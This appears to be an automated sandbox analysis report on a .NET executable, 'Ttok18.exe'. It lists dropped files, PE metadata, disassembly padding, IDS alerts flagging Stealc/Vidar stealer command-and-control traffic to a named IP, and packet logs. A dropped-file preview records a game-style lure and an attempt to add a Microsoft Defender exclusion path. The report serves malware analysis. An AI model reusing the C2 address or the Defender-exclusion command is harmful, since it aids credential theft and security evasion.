                                                                                                                                                                      Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):5162
                                                                                                                                                                      Entropy (8bit):5.3503139230837595
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                      MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                      SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                      SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                      SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                      Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                      Entropy (8bit):4.301517070642596
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                      MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                      SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                      SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                      SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                      Process:C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3635
                                                                                                                                                                      Entropy (8bit):5.145130246324884
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:3ZEbs7qCfpwwyxK0w4Zticx+3OtZx+3QlticB+3OtZB+3Qqntic0+3OtZ0+3i0wP:ebUwtNw4s5gY5gqlqvwbOo
                                                                                                                                                                      MD5:E871551FB912FC1DC0B8DE094A85C899
                                                                                                                                                                      SHA1:F11CFABA51A468EDDE8796CE918797AC6BAAE009
                                                                                                                                                                      SHA-256:58366D47C49A541363F455148C428501B7B83BA2D2E0D7044BCBC3B240AA9E67
                                                                                                                                                                      SHA-512:E2526D5B0A7D6B51468FD9807945B93415C9C1FC4709E97161F2EBF3300383AE8183B99724CED12E9723CD65088AD225EEAE37FC313E4A8A6B6D2436C82624B5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Guess the word from the list:..1. Jungle..2. Banana..3. Fish..4. Lion..5. Kite..6. Nest..7. Monkey..8. Penguin..9. Queen..10. Island..11. Giraffe..12. Car..13. Clan..14. River..15. Tree..16. Sun..17. Ocean..18. Apple..19. Dog..20. House..21. Elephant..Enter the word: .Time's up! The program will input the word 'Clan'...Folder 'AAxBDhzeE' successfully created on C drive....You won a random image:.... ___.. .' '... / \.. | |.. \ /.. '. .'.. `-'....What image was generated? (fish, mountain, boat): .Time's up! The program will input the correct answer: boat..Error adding exclusion for C:\AAxBDhzeE: Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\AAxBDhzeE..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Ad
                                                                                                                                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Entropy (8bit):0.008789177963329333
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                      File name:Ttok18.exe
                                                                                                                                                                      File size:22'020'096 bytes
                                                                                                                                                                      MD5:3544b39481484f67f807e54dd58a93d6
                                                                                                                                                                      SHA1:36691434d2adbb78798bd87090a44e011a4188b8
                                                                                                                                                                      SHA256:ba979aec878047d3191de74aeed1cb884802da8a1bda6ad8323d5bfae9d528fe
                                                                                                                                                                      SHA512:4f255c473e67563d7121d9846b1027f2af5a4a3acbadd22b1f596ae248d9e981d56c6757198d0d6ee7bb8219e0e333da4b077de78187b2621ae167f279d97c26
                                                                                                                                                                      SSDEEP:384:x7NC8gTTF+chkAcvEUgE2a24dsp0T808rFaVz:PxgvF+6kVvfbcRaJ
                                                                                                                                                                      TLSH:EA27E60223E95126FA7F6B7D5C7242144733BDA3AC36EB4C29EC604E5FA778449607A3
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?..........."...0..4...........S... ...`....@.. ....................................`................................
                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                      Entrypoint:0x4053fa
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:4
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                      Instruction
                                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x53a80x4f.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x58c.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x531c0x38.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x20000x34000x3400011f0b5a834ddae1739be2df85bbd209False0.48828125data5.376676584631292IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rsrc0x60000x58c0x6006ce900aa6f5ef6addbe166008c1ea961False0.4134114583333333data4.023178449253273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x80000xc0x200ada691d652edc54d38296e18f64ff460False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_VERSION0x60900x2fcdata0.43848167539267013
                                                                                                                                                                      RT_MANIFEST0x639c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                      DLLImport
                                                                                                                                                                      mscoree.dll_CorExeMain
                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-12-04T17:04:35.430618+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1159.69.102.165443192.168.2.449742TCP
                                                                                                                                                                      2024-12-04T17:04:37.730153+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.449743159.69.102.165443TCP
                                                                                                                                                                      2024-12-04T17:04:37.730347+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11159.69.102.165443192.168.2.449743TCP
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Dec 4, 2024 17:04:17.954444885 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:17.954487085 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:17.954610109 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:17.967503071 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:17.967521906 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:19.553913116 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:19.554038048 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:19.559760094 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:19.559778929 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:19.559998989 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:19.600982904 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:19.674376011 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:19.715334892 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:20.487308979 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:20.487423897 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:20.487492085 CET4434973620.233.83.145192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:20.487633944 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:20.487634897 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:20.520447016 CET49736443192.168.2.420.233.83.145
                                                                                                                                                                      Dec 4, 2024 17:04:20.675961018 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:20.676006079 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:20.676110983 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:20.676506042 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:20.676520109 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:21.891665936 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:21.891750097 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:21.900067091 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:21.900099039 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:21.900352955 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:21.907147884 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:21.951330900 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.334192038 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.334250927 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.334280968 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.334321022 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.334352970 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.334400892 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.334408045 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.351095915 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.351130009 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.351217985 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.351239920 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.351288080 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.357352972 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.365784883 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.365843058 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.365854025 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.413511992 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.454448938 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.507257938 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.507277966 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.533970118 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.534035921 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.534046888 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.537998915 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.538045883 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.538054943 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.553414106 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.553447962 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.553595066 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.553602934 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.553668022 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.560919046 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.569572926 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.569638014 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.569645882 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.577528954 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.577609062 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.577616930 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.584306955 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.584381104 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.584404945 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.592000961 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.592067003 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.592075109 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.598087072 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.598145008 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.598154068 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.610266924 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.610333920 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.610353947 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.610364914 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.610404015 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.615670919 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.621882915 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.621953964 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.621961117 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.663554907 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.740025043 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.740036011 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.740087032 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.740106106 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.740135908 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.740144968 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.740161896 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.740197897 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.740225077 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.770773888 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.770783901 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.770819902 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.770834923 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.770968914 CET49737443192.168.2.4185.199.111.133
